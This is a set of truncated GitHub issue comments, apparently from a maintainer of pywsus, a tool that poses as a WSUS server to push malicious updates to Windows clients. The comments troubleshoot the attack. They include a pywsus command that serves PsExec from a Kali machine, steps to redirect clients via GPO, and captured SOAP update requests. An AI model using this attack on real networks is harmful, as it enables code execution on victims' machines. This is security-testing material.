Julien

Hi @fneur and thank you for the detailed issue. I would have time to redo the attack with your configuration in next weeks. Probable issue that I could think on...

Hi @fneur I just updated everything and it seem to work with a basic MiTM attack: - Kali - ```sudo python3 pywsus.py -H 192.168.178.141 -p 8530 -e sysint/PsExec.exe -c '/accepteula...

Hi @fneur, Just did a test and it work on my side. From the DC, I changed the GPO to put my kali as the WSUS server:  After that...

Well, I see no difference except ID, time and uid... Here is the `SyncUpdates` SOAP call. Yours: ``` POST /ClientWebService/client.asmx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/xml; charset=utf-8...

Interesting command, didn't know about it. [WindowsUpdate.log](https://github.com/GoSecure/pywsus/files/6987248/WindowsUpdate.log) (Lots of garbage in the logs from testing) Thank you.

Hi @fneur and thank you for the time you take to address this issue with us. For now it does not ring any bell, but I will try with a...

I got the same issue with a non-domain joined host. ``` POST /ClientWebService/client.asmx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/xml; charset=utf-8 Accept-Encoding: xpress User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.32 SOAPAction: "http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/SyncUpdates"...

I found something. Fresh Windows 10 not domain joined but with latest update from MSFT * The windows 10 clients do not ask for GetExtendedUpdateInfo Fresh Windows 10 not domain...

Thanks for following up. I'm working on it when it possible. The status is that I'm confident the attack could work on a non-domain join computer. Performing the attack, the...